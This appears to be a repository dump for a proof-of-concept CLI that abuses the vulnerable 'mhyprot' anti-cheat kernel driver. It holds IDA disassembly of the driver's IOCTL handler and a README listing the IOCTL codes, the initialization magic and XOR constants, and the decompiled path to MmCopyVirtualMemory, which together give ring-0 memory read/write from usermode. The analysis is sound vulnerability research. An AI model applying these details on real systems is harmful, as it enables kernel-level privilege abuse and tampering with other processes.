PAGE:FFFFF800188CD815 mul rcx
PAGE:FFFFF800188CD818 shr rdx, 5
PAGE:FFFFF800188CD81C mov ecx, edx
PAGE:FFFFF800188CD81E mov rdx, r14
PAGE:FFFFF800188CD821 mov [r14], rcx
PAGE:FFFFF800188CD824 mov rcx, rdi
PAGE:FFFFF800188CD827 call sub_FFFFF800188C32B0
PAGE:FFFFF800188CD82C mov [rbp+30h], eax
PAGE:FFFFF800188CD82F mov rcx, [r14]
PAGE:FFFFF800188CD832 test eax, eax
PAGE:FFFFF800188CD834 js short loc_FFFFF800188CD853
PAGE:FFFFF800188CD836 lea r8, [rcx+rcx*2]
PAGE:FFFFF800188CD83A shl r8, 4
PAGE:FFFFF800188CD83E add r8, 8
PAGE:FFFFF800188CD842
PAGE:FFFFF800188CD842 loc_FFFFF800188CD842: ; CODE XREF: sub_FFFFF800188CD6E0+1FC↓j
PAGE:FFFFF800188CD842 mov rdx, r14
PAGE:FFFFF800188CD845 mov [rbp+38h], r8
PAGE:FFFFF800188CD849 mov rcx, rdi
PAGE:FFFFF800188CD84C call sub_FFFFF800188C75C0
PAGE:FFFFF800188CD851 jmp short loc_FFFFF800188CD85B
PAGE:FFFFF800188CD853 ; ---------------------------------------------------------------------------
PAGE:FFFFF800188CD853
PAGE:FFFFF800188CD853 loc_FFFFF800188CD853: ; CODE XREF: sub_FFFFF800188CD6E0+154↑j
PAGE:FFFFF800188CD853 mov esi, 8
PAGE:FFFFF800188CD858 mov [rdi], rcx
PAGE:FFFFF800188CD85B
PAGE:FFFFF800188CD85B loc_FFFFF800188CD85B: ; CODE XREF: sub_FFFFF800188CD6E0+171↑j
PAGE:FFFFF800188CD85B ; sub_FFFFF800188CD6E0+208↓j
PAGE:FFFFF800188CD85B mov edx, 4746544Dh
PAGE:FFFFF800188CD860 mov rcx, r14
PAGE:FFFFF800188CD863 jmp loc_FFFFF800188CDA49
PAGE:FFFFF800188CD868 ; ---------------------------------------------------------------------------
PAGE:FFFFF800188CD868
PAGE:FFFFF800188CD868 loc_FFFFF800188CD868: ; CODE XREF: sub_FFFFF800188CD6E0+EE↑j
PAGE:FFFFF800188CD868 cmp ecx, 82104000h
PAGE:FFFFF800188CD86E jnz short loc_FFFFF800188CD8ED
PAGE:FFFFF800188CD870 cmp r8d, 28h ; '('
PAGE:FFFFF800188CD874 jb loc_FFFFF800188CDA4F
PAGE:FFFFF800188CD87A cmp esi, 20h ; ' '
PAGE:FFFFF800188CD87D jb loc_FFFFF800188CDA4F
PAGE:FFFFF800188CD883 test rdi, rdi
PAGE:FFFFF800188CD886 jz loc_FFFFF800188CDA4F
PAGE:FFFFF800188CD88C mov r8d, 4746544Dh ; Tag
PAGE:FFFFF800188CD892 mov rdx, rsi ; NumberOfBytes
PAGE:FFFFF800188CD895 mov ecx, 1 ; PoolType
PAGE:FFFFF800188CD89A call cs:ExAllocatePoolWithTag
PAGE:FFFFF800188CD8A0 mov r14, rax
PAGE:FFFFF800188CD8A3 lea rcx, [rsi-4]
PAGE:FFFFF800188CD8A7 mov rax, 0AAAAAAAAAAAAAAABh
PAGE:FFFFF800188CD8B1 mul rcx
PAGE:FFFFF800188CD8B4 mov rcx, rdi
PAGE:FFFFF800188CD8B7 shr rdx, 4
PAGE:FFFFF800188CD8BB mov [r14], edx
PAGE:FFFFF800188CD8BE mov rdx, r14
PAGE:FFFFF800188CD8C1 call sub_FFFFF800188C377C
PAGE:FFFFF800188CD8C6 mov [rbp+30h], eax
PAGE:FFFFF800188CD8C9 mov ecx, [r14]
PAGE:FFFFF800188CD8CC test eax, eax
PAGE:FFFFF800188CD8CE js short loc_FFFFF800188CD8E1
PAGE:FFFFF800188CD8D0 lea rcx, [rcx+rcx*2]
PAGE:FFFFF800188CD8D4 lea r8, ds:4[rcx*8]
PAGE:FFFFF800188CD8DC jmp loc_FFFFF800188CD842
PAGE:FFFFF800188CD8E1 ; ---------------------------------------------------------------------------
PAGE:FFFFF800188CD8E1
PAGE:FFFFF800188CD8E1 loc_FFFFF800188CD8E1: ; CODE XREF: sub_FFFFF800188CD6E0+1EE↑j
PAGE:FFFFF800188CD8E1 mov esi, 4
PAGE:FFFFF800188CD8E6 mov [rdi], ecx
PAGE:FFFFF800188CD8E8 jmp loc_FFFFF800188CD85B
PAGE:FFFFF800188CD8ED ; ---------------------------------------------------------------------------
PAGE:FFFFF800188CD8ED
PAGE:FFFFF800188CD8ED loc_FFFFF800188CD8ED: ; CODE XREF: sub_FFFFF800188CD6E0+18E↑j
PAGE:FFFFF800188CD8ED cmp ecx, 82094000h
PAGE:FFFFF800188CD8F3 jnz short loc_FFFFF800188CD8FD
PAGE:FFFFF800188CD8F5 and dword ptr [rdi], 0
PAGE:FFFFF800188CD8F8 jmp loc_FFFFF800188CDA4F
PAGE:FFFFF800188CD8FD ; ---------------------------------------------------------------------------
PAGE:FFFFF800188CD8FD
PAGE:FFFFF800188CD8FD loc_FFFFF800188CD8FD: ; CODE XREF: sub_FFFFF800188CD6E0+213↑j
PAGE:FFFFF800188CD8FD cmp ecx, 80034000h ; MHYPROT_IOCTL_INITIALIZE
PAGE:FFFFF800188CD903 jnz short loc_FFFFF800188CD984
PAGE:FFFFF800188CD905 cmp r8d, 10h
PAGE:FFFFF800188CD909 jnz loc_FFFFF800188CDA4F
PAGE:FFFFF800188CD90F mov rax, 0EBBAAEF4FFF89042h
PAGE:FFFFF800188CD919 xor [rdi+8], rax
PAGE:FFFFF800188CD91D mov rax, [rdi+8]
PAGE:FFFFF800188CD921 xor [rdi], rax
PAGE:FFFFF800188CD924 cmp dword ptr [rdi+4], 0BAEBAEECh
PAGE:FFFFF800188CD92B jnz loc_FFFFF800188CDA4F
PAGE:FFFFF800188CD931 mov ecx, [rdi]
PAGE:FFFFF800188CD933 call sub_FFFFF800188C51A8
PAGE:FFFFF800188CD938 cmp dword ptr cs:qword_FFFFF800188CA108, 0
PAGE:FFFFF800188CD93F jnz short loc_FFFFF800188CD97D
PAGE:FFFFF800188CD941 mov rdx, [rdi+8]
PAGE:FFFFF800188CD945 lea rcx, xmmword_FFFFF800188CA0E8
PAGE:FFFFF800188CD94C call sub_FFFFF800188C301C
PAGE:FFFFF800188CD951 mov ebx, 7
PAGE:FFFFF800188CD956
PAGE:FFFFF800188CD956 loc_FFFFF800188CD956: ; CODE XREF: sub_FFFFF800188CD6E0+293↓j
PAGE:FFFFF800188CD956 lea rcx, xmmword_FFFFF800188CA0E8
PAGE:FFFFF800188CD95D call sub_FFFFF800188C2EB0
PAGE:FFFFF800188CD962 mov [rdi], rax
PAGE:FFFFF800188CD965 mov dword ptr cs:qword_FFFFF800188CA108, 1
PAGE:FFFFF800188CD96F sub rbx, 1
PAGE:FFFFF800188CD973 jnz short loc_FFFFF800188CD956
PAGE:FFFFF800188CD975 lea esi, [rbx+8]
PAGE:FFFFF800188CD978 jmp loc_FFFFF800188CDA4F
PAGE:FFFFF800188CD97D ; ---------------------------------------------------------------------------
PAGE:FFFFF800188CD97D
PAGE:FFFFF800188CD97D loc_FFFFF800188CD97D: ; CODE XREF: sub_FFFFF800188CD6E0+25F↑j
PAGE:FFFFF800188CD97D xor esi, esi
PAGE:FFFFF800188CD97F jmp loc_FFFFF800188CDA4F
PAGE:FFFFF800188CD984 ; ---------------------------------------------------------------------------
PAGE:FFFFF800188CD984
PAGE:FFFFF800188CD984 loc_FFFFF800188CD984: ; CODE XREF: sub_FFFFF800188CD6E0+223↑j
PAGE:FFFFF800188CD984 cmp ecx, 81134000h
PAGE:FFFFF800188CD98A jz loc_FFFFF800188CDA4F
PAGE:FFFFF800188CD990 cmp ecx, 81144000h
PAGE:FFFFF800188CD996 jnz short loc_FFFFF800188CD9DE
PAGE:FFFFF800188CD998 mov ecx, [rdi]
PAGE:FFFFF800188CD99A lea rdx, [rsp+1C8h+var_198]
PAGE:FFFFF800188CD99F call sub_FFFFF800188C6654
PAGE:FFFFF800188CD9A4 test eax, eax
PAGE:FFFFF800188CD9A6 jns short loc_FFFFF800188CD9B2
PAGE:FFFFF800188CD9A8 mov esi, 4
PAGE:FFFFF800188CD9AD jmp loc_FFFFF800188CD7C1
PAGE:FFFFF800188CD9B2 ; ---------------------------------------------------------------------------
PAGE:FFFFF800188CD9B2
PAGE:FFFFF800188CD9B2 loc_FFFFF800188CD9B2: ; CODE XREF: sub_FFFFF800188CD6E0+2C6↑j
PAGE:FFFFF800188CD9B2 lea esi, [rax+rax*2]
PAGE:FFFFF800188CD9B5 movsxd rcx, eax
PAGE:FFFFF800188CD9B8 shl esi, 3
PAGE:FFFFF800188CD9BB test eax, eax
PAGE:FFFFF800188CD9BD jle loc_FFFFF800188CDA4F
PAGE:FFFFF800188CD9C3 lea r8, [rcx+rcx*2]
PAGE:FFFFF800188CD9C7 mov rcx, rdi
PAGE:FFFFF800188CD9CA shl r8, 3
PAGE:FFFFF800188CD9CE lea rdx, [rsp+1C8h+var_198]
PAGE:FFFFF800188CD9D3 and r8, 0FFFFFFFFFFFFFFF8h
PAGE:FFFFF800188CD9D7 call sub_FFFFF800188C75C0
PAGE:FFFFF800188CD9DC jmp short loc_FFFFF800188CDA4F
PAGE:FFFFF800188CD9DE ; ---------------------------------------------------------------------------
PAGE:FFFFF800188CD9DE
PAGE:FFFFF800188CD9DE loc_FFFFF800188CD9DE: ; CODE XREF: sub_FFFFF800188CD6E0+2B6↑j
PAGE:FFFFF800188CD9DE and [rsp+1C8h+P], 0
PAGE:FFFFF800188CD9E7 lea rax, [rsp+1C8h+arg_8]
PAGE:FFFFF800188CD9EF and [rsp+1C8h+arg_8], 0
PAGE:FFFFF800188CD9F7 lea r9, [rsp+1C8h+P]
PAGE:FFFFF800188CD9FF mov rdx, rdi
PAGE:FFFFF800188CDA02 mov [rsp+1C8h+var_1A8], rax
PAGE:FFFFF800188CDA07 call sub_FFFFF800188CD000
PAGE:FFFFF800188CDA0C test al, al
PAGE:FFFFF800188CDA0E jz short loc_FFFFF800188CDA4F
PAGE:FFFFF800188CDA10 mov eax, [rsp+1C8h+arg_8]
PAGE:FFFFF800188CDA17 cmp esi, eax
PAGE:FFFFF800188CDA19 mov rbx, [rsp+1C8h+P]
PAGE:FFFFF800188CDA21 cmovb eax, esi
PAGE:FFFFF800188CDA24 mov [rsp+1C8h+arg_8], eax
PAGE:FFFFF800188CDA2B test rbx, rbx
PAGE:FFFFF800188CDA2E jz short loc_FFFFF800188CDA4F
PAGE:FFFFF800188CDA30 test eax, eax
PAGE:FFFFF800188CDA32 jz short loc_FFFFF800188CDA4F
PAGE:FFFFF800188CDA34 mov r8d, eax
PAGE:FFFFF800188CDA37 mov rdx, rbx
PAGE:FFFFF800188CDA3A mov rcx, rdi
PAGE:FFFFF800188CDA3D mov esi, eax
PAGE:FFFFF800188CDA3F call sub_FFFFF800188C75C0
PAGE:FFFFF800188CDA44 xor edx, edx ; Tag
PAGE:FFFFF800188CDA46 mov rcx, rbx ; P
PAGE:FFFFF800188CDA49
PAGE:FFFFF800188CDA49 loc_FFFFF800188CDA49: ; CODE XREF: sub_FFFFF800188CD6E0+183↑j
PAGE:FFFFF800188CDA49 call cs:ExFreePoolWithTag
PAGE:FFFFF800188CDA4F
PAGE:FFFFF800188CDA4F loc_FFFFF800188CDA4F: ; CODE XREF: sub_FFFFF800188CD6E0+6B↑j
PAGE:FFFFF800188CDA4F ; sub_FFFFF800188CD6E0+81↑j ...
PAGE:FFFFF800188CDA4F mov eax, esi
PAGE:FFFFF800188CDA51 xor edx, edx ; PriorityBoost
PAGE:FFFFF800188CDA53 mov [rbp+38h], rax
PAGE:FFFFF800188CDA57 mov rcx, rbp ; Irp
PAGE:FFFFF800188CDA5A and dword ptr [rbp+30h], 0
PAGE:FFFFF800188CDA5E call cs:IofCompleteRequest
PAGE:FFFFF800188CDA64 lea r11, [rsp+1C8h+var_18]
PAGE:FFFFF800188CDA6C xor eax, eax
PAGE:FFFFF800188CDA6E mov rbx, [r11+20h]
PAGE:FFFFF800188CDA72 mov rbp, [r11+38h]
PAGE:FFFFF800188CDA76 mov rsp, r11
PAGE:FFFFF800188CDA79 pop r14
PAGE:FFFFF800188CDA7B pop rdi
PAGE:FFFFF800188CDA7C pop rsi
PAGE:FFFFF800188CDA7D retn
PAGE:FFFFF800188CDA7D sub_FFFFF800188CD6E0 endp
================================================
FILE: LICENSE
================================================
MIT License
Copyright (c) 2020 Kento Oki
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
================================================
FILE: README.md
================================================
# evil-mhyprot-cli
A PoC for vulnerable driver "mhyprot" that allows us to read/write memory in kernel/user from usermode.
### Static Library is here: [libmhyprot](https://github.com/kkent030315/libmhyprot)
# Overview
What we can do with this CLI is as follows:
- Read/Write any kernel memory with privilege of kernel from usermode
- Read/Write any user memory with privilege of kernel from usermode
- All operations are executed as kernel level privilege (ring-0) by the vulnerable driver
Also:
- Administrator privilege only needed if the service is not yet running
- Therefore we can execute commands above as the normal user (w/o administrator privilege)
---
The `mhyprot` is an anti-cheat kernel mode driver used in [`Genshin Impact`](https://genshin.mihoyo.com/ja).
The driver has a vulnerable `IOCTL` commands that allows us to execute `MmCopyVirtualMemory` and `memcpy(in the kernel!)` from ring-3 (usermode).
# Impact
Investigating
# Requirements
- Any version of Windows x64 that the driver works on
- Administrator privilege does not required if the service already running
Tested on:
- Windows10 x64 1903
- Windows7 x64 6.1
- Windows8.1 x64 6.3
# Usage
```
bin.exe [TargetProcess] -options
```
following options are available as of now:
- `t`
- Perform Tests
- `d`
- Print debug infos
- `s`
- Print seedmap
# Analysis and Proofs
> The document(s) below is still in write
so please forgive any mistakes I took in advance.
## IOCTL Handler Functions
So what I did is that to reverse engineering around IOCTL handling functionalities.
Since around ioctl functions and its functionalities are packed, to reverse engineering is not easy than average.
but I can still easily find the function that registered at `DriverObject->MajorFunction[IRP_MJ_DEVICE_CONTROL]` since the IOCTL handler must have an `IoCompleteRequest` or like `IofCompleteRequest` that exported by `ntoskrnl`.
(Btw `IoCompleteRequest` is just a wrapper of `IofCompleteRequest`)
As mhyprot imports `IofCompleteRequest` then go xrefs, and we will see there are many ioctl handlers.
Concretely, I found two big subroutine in packed segment.
I've added it to [this repo](IDA) as binary since it's too big.
- [sub_FFFFF800188CD000](IDA/sub_FFFFF800188CD000.txt)
- -> [Pseudocode](https://github.com/kkent030315/evil-mhyprot-cli/blob/main/IDA/FUN_0001d000.cpp)
- [sub_FFFFF800188CD6E0](IDA/sub_FFFFF800188CD6E0.txt)
- -> [Pseudocode](https://github.com/kkent030315/evil-mhyprot-cli/blob/main/IDA/FUN_0001d6e0.cpp)
I will keep update if I found more another subroutine.
## Driver Initialization
The `MHYPROT_IOCTL_INITIALIZE` what I defined in [mhyprot.hpp#L18](src/mhyprot.hpp#L18) can be found as follows:
```cpp
PAGE:FFFFF800188CD8FD loc_FFFFF800188CD8FD: ; CODE XREF: sub_FFFFF800188CD6E0+213↑j
PAGE:FFFFF800188CD8FD cmp ecx, 80034000h ; MHYPROT_IOCTL_INITIALIZE
PAGE:FFFFF800188CD903 jnz short loc_FFFFF800188CD984
PAGE:FFFFF800188CD905 cmp r8d, 10h
PAGE:FFFFF800188CD909 jnz loc_FFFFF800188CDA4F
PAGE:FFFFF800188CD90F mov rax, 0EBBAAEF4FFF89042h // <- _m_002
PAGE:FFFFF800188CD919 xor [rdi+8], rax
PAGE:FFFFF800188CD91D mov rax, [rdi+8]
PAGE:FFFFF800188CD921 xor [rdi], rax
PAGE:FFFFF800188CD924 cmp dword ptr [rdi+4], 0BAEBAEECh // <- _m_001
PAGE:FFFFF800188CD92B jnz loc_FFFFF800188CDA4F
PAGE:FFFFF800188CD931 mov ecx, [rdi]
PAGE:FFFFF800188CD933 call sub_FFFFF800188C51A8
PAGE:FFFFF800188CD938 cmp dword ptr cs:qword_FFFFF800188CA108, 0
PAGE:FFFFF800188CD93F jnz short loc_FFFFF800188CD97D
PAGE:FFFFF800188CD941 mov rdx, [rdi+8]
PAGE:FFFFF800188CD945 lea rcx, xmmword_FFFFF800188CA0E8
PAGE:FFFFF800188CD94C call sub_FFFFF800188C301C // <-
PAGE:FFFFF800188CD951 mov ebx, 7
```
and the `sub_FFFFF800188C301C` is look like:
```cpp
.text:FFFFF800188C301C ; =============== S U B R O U T I N E =======================================
.text:FFFFF800188C301C
.text:FFFFF800188C301C
.text:FFFFF800188C301C sub_FFFFF800188C301C proc near ; CODE XREF: sub_FFFFF800188CD6E0+26C↓p
.text:FFFFF800188C301C ; DATA XREF: .upx0:FFFFF800189F2BA8↓o
.text:FFFFF800188C301C
.text:FFFFF800188C301C arg_0 = qword ptr 8
.text:FFFFF800188C301C
.text:FFFFF800188C301C test rcx, rcx
.text:FFFFF800188C301F jz locret_FFFFF800188C30B4
.text:FFFFF800188C3025 mov [rsp+arg_0], rbx
.text:FFFFF800188C302A push rdi
.text:FFFFF800188C302B sub rsp, 20h
.text:FFFFF800188C302F xor eax, eax
.text:FFFFF800188C3031 mov rdi, rdx
.text:FFFFF800188C3034 mov [rcx], rax
.text:FFFFF800188C3037 mov rbx, rcx
.text:FFFFF800188C303A mov [rcx+8], rax
.text:FFFFF800188C303E mov edx, 9C0h ; NumberOfBytes
.text:FFFFF800188C3043 xor ecx, ecx ; PoolType
.text:FFFFF800188C3045 call cs:ExAllocatePool
.text:FFFFF800188C304B xor edx, edx
.text:FFFFF800188C304D mov r8d, 9C0h
.text:FFFFF800188C3053 mov rcx, rax
.text:FFFFF800188C3056 mov [rbx], rax
.text:FFFFF800188C3059 call sub_FFFFF800188C7900
.text:FFFFF800188C305E mov rax, [rbx]
.text:FFFFF800188C3061 mov r9d, 1
.text:FFFFF800188C3067 mov [rbx+0Ch], r9d
.text:FFFFF800188C306B mov [rax], rdi
.text:FFFFF800188C306E mov [rbx+8], r9d
.text:FFFFF800188C3072
.text:FFFFF800188C3072 loc_FFFFF800188C3072: ; CODE XREF: sub_FFFFF800188C301C+8C↓j
.text:FFFFF800188C3072 movsxd r8, dword ptr [rbx+8]
.text:FFFFF800188C3076 mov rdx, [rbx]
.text:FFFFF800188C3079 mov rax, [rdx+r8*8-8]
.text:FFFFF800188C307E mov rcx, rax
.text:FFFFF800188C3081 shr rcx, 3Eh
.text:FFFFF800188C3085 xor rcx, rax
.text:FFFFF800188C3088 mov rax, 5851F42D4C957F2Dh
.text:FFFFF800188C3092 imul rcx, rax
.text:FFFFF800188C3096 add rcx, r8
.text:FFFFF800188C3099 mov [rdx+r8*8], rcx
.text:FFFFF800188C309D add [rbx+8], r9d
.text:FFFFF800188C30A1 cmp dword ptr [rbx+8], 138h
.text:FFFFF800188C30A8 jl short loc_FFFFF800188C3072
.text:FFFFF800188C30AA mov rbx, [rsp+28h+arg_0]
.text:FFFFF800188C30AF add rsp, 20h
.text:FFFFF800188C30B3 pop rdi
.text:FFFFF800188C30B4
.text:FFFFF800188C30B4 locret_FFFFF800188C30B4: ; CODE XREF: sub_FFFFF800188C301C+3↑j
.text:FFFFF800188C30B4 retn
.text:FFFFF800188C30B4 sub_FFFFF800188C301C endp
```
## A Way of Read/Write Specific Process Memory
The mhyprot calls `MmCopyVirtualMemory` eventually as wrapper defined as follows:
```cpp
__int64 __fastcall sub_FFFFF800188C3EB8(struct _EPROCESS *a1, _DWORD *a2, __int64 a3)
{
__int64 v3; // rbp
_DWORD *v4; // rdi
struct _EPROCESS *v5; // rbx
PEPROCESS v6; // rsi
char v8; // [rsp+28h] [rbp-20h]
v3 = a3;
v4 = a2;
v5 = a1;
if ( *a2 == 1 )
{
v6 = IoGetCurrentProcess();
}
else
{
v6 = a1;
v5 = IoGetCurrentProcess();
}
v8 = 0;
return MmCopyVirtualMemory(v6, *((_QWORD *)v4 + 3), v5, *((_QWORD *)v4 + 2), (unsigned int)v4[8], v8, v3);
}
```
Called by:
```cpp
__int64 __fastcall sub_FFFFF800188C3F2C(_DWORD *a1_rw_request, __int64 a2_returnsize, __int64 a3)
{
__int64 v3_returnsize; // rsi
_DWORD *v4_rw_request; // rbx
__int64 v5_processid; // rcx
bool v6_ntstatus_lookup_success_bool; // di
unsigned int v8_ntstatus; // ebx
PVOID Object; // [rsp+40h] [rbp+8h]
v3_returnsize = a2_returnsize;
v4_rw_request = a1_rw_request;
v5_processid = (unsigned int)a1_rw_request[2];
Object = 0i64;
v6_ntstatus_lookup_success_bool = (int)PsLookupProcessByProcessId(v5_processid, &Object, a3) >= 0;// NT_SUCCESS
if ( !Object )
return 3221225473i64;
v8_ntstatus = sub_FFFFF800188C3EB8((struct _EPROCESS *)Object, v4_rw_request, v3_returnsize);
if ( v6_ntstatus_lookup_success_bool )
ObfDereferenceObject(Object);
return v8_ntstatus;
}
```
Called by:
```cpp
bool __fastcall sub_FFFFF800188C4214(_DWORD *a1_rw_request, _DWORD *a2_returnsize, __int64 a3)
{
_DWORD *v3_returnsize; // rbx
int v5_ntstatus; // [rsp+20h] [rbp-18h]
__int64 v6_returnsize; // [rsp+50h] [rbp+18h]
v3_returnsize = a2_returnsize;
v6_returnsize = 0i64;
v5_ntstatus = sub_FFFFF800188C3F2C(a1_rw_request, (__int64)&v6_returnsize, a3);
*v3_returnsize = v6_returnsize;
return v5_ntstatus == 0; // NT_SUCCESS(v5_ntstatus)
}
```
Finally we are at the root of the tree:
```cpp
PAGE:FFFFF800188CD303 loc_FFFFF800188CD303: ; CODE XREF: sub_FFFFF800188CD000+2C7↑j
PAGE:FFFFF800188CD303 and dword ptr [rbp+1D0h+arg_20], 0
PAGE:FFFFF800188CD30A lea rdx, [rbp+1D0h+arg_20]
PAGE:FFFFF800188CD311 mov rcx, [rsp+30h]
PAGE:FFFFF800188CD316 call sub_FFFFF800188C4214 // <- Here
PAGE:FFFFF800188CD31B jmp loc_FFFFF800188CD21C
```
Call map:
## A Way of Read Kernel Memory
We can see so many IOCTL commands and the `MHYPROT_IOCTL_READ_KERNEL_MEMORY` what I defined in [mhyprot.hpp#L19](src/mhyprot.hpp#L19) can be found as follows:
```cpp
PAGE:FFFFF800188CD7A9 loc_FFFFF800188CD7A9: ; CODE XREF: sub_FFFFF800188CD6E0+BA↑j
PAGE:FFFFF800188CD7A9 cmp ecx, 83064000h ; MHYPROT_IOCTL_READ_KERNEL_MEMORY
PAGE:FFFFF800188CD7AF jnz short loc_FFFFF800188CD7C8
PAGE:FFFFF800188CD7B1 mov rdx, [rdi]
PAGE:FFFFF800188CD7B4 lea rcx, [rdi+4]
PAGE:FFFFF800188CD7B8 mov r8d, [rdi+8]
PAGE:FFFFF800188CD7BC call sub_FFFFF800188C63A8 // <-
```
And the `sub_FFFFF800188C63A8` is like:
```cpp
.text:FFFFF800188C63A8 sub_FFFFF800188C63A8 proc near ; CODE XREF: sub_FFFFF800188CD6E0+DC↓p
.text:FFFFF800188C63A8 ; DATA XREF: .upx0:FFFFF800189F2EE4↓o
.text:FFFFF800188C63A8
.text:FFFFF800188C63A8 arg_0 = qword ptr 8
.text:FFFFF800188C63A8 arg_8 = qword ptr 10h
.text:FFFFF800188C63A8
.text:FFFFF800188C63A8 mov [rsp+arg_0], rbx
.text:FFFFF800188C63AD mov [rsp+arg_8], rsi
.text:FFFFF800188C63B2 push rdi
.text:FFFFF800188C63B3 sub rsp, 20h
.text:FFFFF800188C63B7 mov edi, r8d
.text:FFFFF800188C63BA mov rbx, rdx
.text:FFFFF800188C63BD mov rsi, rcx
.text:FFFFF800188C63C0 test rdx, rdx
.text:FFFFF800188C63C3 jz short loc_FFFFF800188C63F2
.text:FFFFF800188C63C5 test r8d, r8d
.text:FFFFF800188C63C8 jz short loc_FFFFF800188C63F2
.text:FFFFF800188C63CA mov rax, cs:MmHighestUserAddress
.text:FFFFF800188C63D1 cmp rdx, [rax]
.text:FFFFF800188C63D4 jb short loc_FFFFF800188C63F2
.text:FFFFF800188C63D6 mov r8d, edi
.text:FFFFF800188C63D9 xor edx, edx
.text:FFFFF800188C63DB call sub_FFFFF800188C7900
.text:FFFFF800188C63E0 mov r8d, edi
.text:FFFFF800188C63E3 mov rdx, rsi
.text:FFFFF800188C63E6 mov rcx, rbx
.text:FFFFF800188C63E9 call sub_FFFFF800188C3DD8
.text:FFFFF800188C63EE xor eax, eax
.text:FFFFF800188C63F0 jmp short loc_FFFFF800188C63F5
```
Here is the ioctl handlers, found the `0x83064000`(`MHYPROT_IOCTL_READ_KERNEL_MEMORY`) as `cmp ecx, 83064000h` and some another ioctl codes as follows:
Call map:
As I defined as `DWORD result` in [mhyprot.hpp#L40](https://github.com/kkent030315/evil-mhyprot-cli/blob/main/src/mhyprot.hpp#L40) the first 4bytes is result.
I can guess it's a `NTSTATUS` as it typedef'ed as `typedef LONG NTSTATUS` natively and the dispathers return types are `NTSTATUS` and the result will directly be got stored from it.
================================================
FILE: evil-mhyprot-cli.sln
================================================
Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio Version 16
VisualStudioVersion = 16.0.30320.27
MinimumVisualStudioVersion = 10.0.40219.1
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "evil-mhyprot", "src\evil-mhyprot-cli.vcxproj", "{0D17A4B4-A7C4-49C0-99E3-B856F9F3B271}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|x64 = Debug|x64
Debug|x86 = Debug|x86
Release|x64 = Release|x64
Release|x86 = Release|x86
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{0D17A4B4-A7C4-49C0-99E3-B856F9F3B271}.Debug|x64.ActiveCfg = Debug|x64
{0D17A4B4-A7C4-49C0-99E3-B856F9F3B271}.Debug|x64.Build.0 = Debug|x64
{0D17A4B4-A7C4-49C0-99E3-B856F9F3B271}.Debug|x86.ActiveCfg = Debug|Win32
{0D17A4B4-A7C4-49C0-99E3-B856F9F3B271}.Debug|x86.Build.0 = Debug|Win32
{0D17A4B4-A7C4-49C0-99E3-B856F9F3B271}.Release|x64.ActiveCfg = Release|x64
{0D17A4B4-A7C4-49C0-99E3-B856F9F3B271}.Release|x64.Build.0 = Release|x64
{0D17A4B4-A7C4-49C0-99E3-B856F9F3B271}.Release|x86.ActiveCfg = Release|Win32
{0D17A4B4-A7C4-49C0-99E3-B856F9F3B271}.Release|x86.Build.0 = Release|Win32
{9B8D68A1-9D42-4CF2-A626-887A782EFB10}.Debug|x64.ActiveCfg = Debug|x64
{9B8D68A1-9D42-4CF2-A626-887A782EFB10}.Debug|x64.Build.0 = Debug|x64
{9B8D68A1-9D42-4CF2-A626-887A782EFB10}.Debug|x86.ActiveCfg = Debug|Win32
{9B8D68A1-9D42-4CF2-A626-887A782EFB10}.Debug|x86.Build.0 = Debug|Win32
{9B8D68A1-9D42-4CF2-A626-887A782EFB10}.Release|x64.ActiveCfg = Release|x64
{9B8D68A1-9D42-4CF2-A626-887A782EFB10}.Release|x64.Build.0 = Release|x64
{9B8D68A1-9D42-4CF2-A626-887A782EFB10}.Release|x86.ActiveCfg = Release|Win32
{9B8D68A1-9D42-4CF2-A626-887A782EFB10}.Release|x86.Build.0 = Release|Win32
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
GlobalSection(ExtensibilityGlobals) = postSolution
SolutionGuid = {74DDB47F-DFB2-4765-B988-8088E5131DB1}
EndGlobalSection
EndGlobal
================================================
FILE: seedmap.txt
================================================
[+] seedmap (00000): 0x4068070C4A24D178
[+] seedmap (00001): 0x6999A42A61B1639
[+] seedmap (00002): 0xDC4C2DCFD11B8DA
[+] seedmap (00003): 0x27F5358F1F77E613
[+] seedmap (00004): 0x88D2F57392877EDE
[+] seedmap (00005): 0xB5F18A5B915E6DFA
[+] seedmap (00006): 0x26AD046BB9DCD500
[+] seedmap (00007): 0xADDA7D3385D88A1F
[+] seedmap (00008): 0x489C7A2A4A3FE1FA
[+] seedmap (00009): 0x711452BAA1665F27
[+] seedmap (00010): 0xDDD6CDCD2DB6FB3C
[+] seedmap (00011): 0xEE130174D3DA0DED
[+] seedmap (00012): 0x45F28155996C409D
[+] seedmap (00013): 0xB0791462FB20F727
[+] seedmap (00014): 0x69DE7BD9173E15B6
[+] seedmap (00015): 0x85B0D332D20319EB
[+] seedmap (00016): 0x6F6FD87A047B8098
[+] seedmap (00017): 0x2355E1231B8BB6BB
[+] seedmap (00018): 0xB5E03F628EFC41E5
[+] seedmap (00019): 0x5600A8A882512979
[+] seedmap (00020): 0x22B482775C3F3499
[+] seedmap (00021): 0x384ECB4164B271A4
[+] seedmap (00022): 0x42A209292A03F0E9
[+] seedmap (00023): 0xB06BE8838253E6AB
[+] seedmap (00024): 0x1485F1760292C71B
[+] seedmap (00025): 0xEA88DB5DEE3A4626
[+] seedmap (00026): 0xA98B9D06EF4EFAE
[+] seedmap (00027): 0xB74067BF63CA5DDB
[+] seedmap (00028): 0x60CE34B9A7C71925
